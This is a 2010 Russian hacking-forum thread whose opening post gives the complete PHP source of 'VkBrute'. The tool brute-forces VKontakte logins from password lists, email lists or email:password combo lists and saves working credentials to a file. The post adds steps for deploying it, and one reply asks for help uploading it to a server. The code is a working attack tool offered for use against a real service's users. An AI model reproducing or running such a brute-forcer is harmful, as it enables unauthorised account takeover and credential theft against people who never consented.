Вернуться   D3Scene.Ru Софт портал игр | Хаки | Проги | Статьи > Другое > Социальные Сети > ВКонтакте > Программы, боты
Присоединяйся к нам



Ответ
 
Опции темы Опции просмотра
Старый 26.05.2010, 14:51   #1
This? On Melancholy Hill




 
Аватар для UnDeaDRoCUser
 
Регистрация: 18.09.2008
Адрес: system32
Сообщений: 5,237
Репутация: 1415
Отправить сообщение для UnDeaDRoCUser с помощью ICQ Отправить сообщение для UnDeaDRoCUser с помощью Skype™
Автор Сообщение

Vkontakte brutforce by ChaaK (на php)


PHP код:
<?php 
#&-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|- 
#&          VkBrute v. 1.03  
#&     author Chaak(ICQ:868922)  
#&-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|- 


if(!isset($_POST['ok'])){ 
?> 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml" lang="ru"> 
<head> 
    <title>.::Vkontakte brutforce by ChaaK::.</title> 
    <style> 
        body{ 
            background-color: black; 
        } 
        table{ 
            color: green; 
            font-weight: bold; 
        } 
        h1{ 
            color: white; 
        } 
    </style> 
</head> 
<body> 
    <center    style="margin-top:70px;"> 
    <form action="" method="POST"> 
        <h1>.::Vkontakte brutforce by ChaaK::.</h1> 
        <table border="1" width="540" height="240"> 
            <tr><td valign="center" height="78" width="150">Тип атаки:</td><td valign="top"> 
            <table border="0" width="100%" height="100%"> 
                <tr><td><input name="attack" value="1" type="radio" checked="1"></td><td align="left">Атака на один email по списку паролей</td></tr> 
                <tr><td><input name="attack" value="2" type="radio"></td><td align="left">Атака на один пароль по списку email'ов</td></tr> 
                <tr><td><input name="attack" value="3" type="radio"></td><td align="left">Атака на список email:password</td></tr> 
            </table>             
            </td></tr> 
            <tr><td width="150" height="15px">E-mail</td><td style="font-size:12px"><input name="email" type="text" value="" size="33"> - для брута(для 1 вида атаки)</td></tr> 
            <tr><td width="150" height="15px">Пароль</td><td style="font-size:12px"><input name="pass" type="text" value="" size="33"> - для брута(для 2 вида атаки)</td></tr> 
            <tr><td width="150" height="15px">Словарь*</td><td><input name="dict" type="text" value="dictionary.txt" size="61"></td></tr> 
            <tr><td width="150" height="15px">Хорошие пароли</td><td><input type="text" name="good" value="good.txt" size="61"></td></tr> 
            <tr><td width="150" height="15px">Агент</td><td style="font-size:12px"><input type="text" name="user" value="Opera/9.50 (Windows NT 6.0; U; ru)" size="61"></td></tr> 
            <tr><td width="150" height="15px">Время работы*</td><td style="font-size:13px"><input type="text" name="time" value="0" size="5"> - время работы скрипта в минутах, если 0 - то бесконечно.</td></tr> 
            <tr><td colspan="2"><input type="submit" name="ok" value="::Начать работу::" style="width: 530px; height: 39px; background-color: black; color: green;"></td></tr> 
        </table> 
    </center> 
    </form> 
</body> 
</html> 
<?php 
}else{ 
set_time_limit(($_POST['time'])*60);  

############################################# 
$email $_POST['email'];             
$passw $_POST['pass'];                            
$dict = @file($_POST['dict']);                 
$type$_POST['attack'];                                          
$result $_POST['good'];                         
$user_agent $_POST['user']; 
############################################# 

function brute($email,$pass) {     
    
$fp=fsockopen("vkontakte.ru",80,$errno,$errstr,10);     
    
$out "GET /login.php?email=".$email."&pass=".$pass." HTTP/1.0\r\n";     
    
$out .= "Host: vkontakte.ru\r\n";     
    
$out .= "User-Agent: ".$GLOBALS['user_agent']."\r\n";     
    
$out .= "Cookie: income=1\r\n";     
    
$out .= "Content-Type:text/xml; charset=windows-1251\r\n\r\n";     
    
fwrite($fp,$out);         
  
$ans='';    
  while(!
feof($fp))    
  {    
  
$ans.=fgets($fp,128);    
  }    
  
fclose($fp);   
  unset(
$out); 
  if(
preg_match("/\b302 Found\b/is"$ans)) return true; else return false;    



if(
$type==1){ 
    for(
$i=0;$i<count($dict);$i++){  
        
$dict[$i]=trim($dict[$i]); 
            if(
brute($email,$dict[$i])){  
                
$fp=fopen($result,'ab');  
                
fwrite($fp,$email.':'.$dict[$i]."\n");  
                   
fclose($fp);          
                exit();  
            } 
        unset(
$dict[$i]); 
        
ob_implicit_flush();  
    } 
}elseif(
$type==2){ 
    for(
$i=0;$i<count($dict);$i++){  
        
$dict[$i]=trim($dict[$i]); 
            if(
brute($dict[$i],$passw)){  
                
$fp=fopen($result,'ab');  
                
fwrite($fp,$dict[$i].':'.$passw."\n");  
                
fclose($fp);         
            } 
        unset(
$dict[$i]); 
        
ob_implicit_flush();  
    } 
}elseif(
$type==3){ 
    for(
$i=0;$i<count($dict);$i++){  
        
$dict[$i]=trim($dict[$i]); 
            
$array explode(":",$dict[$i]);     
                if(
brute($array[0],$array[1])){ 
                    
$fp=fopen($result,'ab');  
                    
fwrite($fp,$array[0].':'.$array[1]."\n");  
                    
fclose($fp);   
                } 
        unset(
$dict[$i]); 
        
ob_implicit_flush();  
    } 

echo 
"Брут завершен! Смотрите результаты в файле <a href='$result'>$result</a>"

?>
- создаем текстовый документ, к примеру brut.txt
- Копируем код в этот документ.
- Переименовываем brut.txt в brut.php
- Заливаем на сервер, либо используем локальном.
__________________
[ [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | ]

[ [Ссылки скрыты от гостей.] ]

  Ответить с цитированием Наверх
Старый 28.05.2010, 00:02   #2
Освоившийся


 
Аватар для ParniSha
 
Регистрация: 11.10.2009
Адрес: Panama
Сообщений: 648
Репутация: 475
По умолчанию

Цитата:
Сообщение от UnDeaDRoCUser Посмотреть сообщение
- Заливаем на сервер, либо используем локальном.
для чайников, распиши этот пункт поподробней плз
[SHOWTOGROUPS="7"]с брата компа сижу -_-[/SHOWTOGROUPS]
  Ответить с цитированием Наверх
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Powered by vBulletin
Copyright © 2017 vBulletin Solutions, Inc.
Перевод: zCarot | Дизайн: G-A | Верстка: OldEr
Текущее время: 02:32. Часовой пояс GMT +4.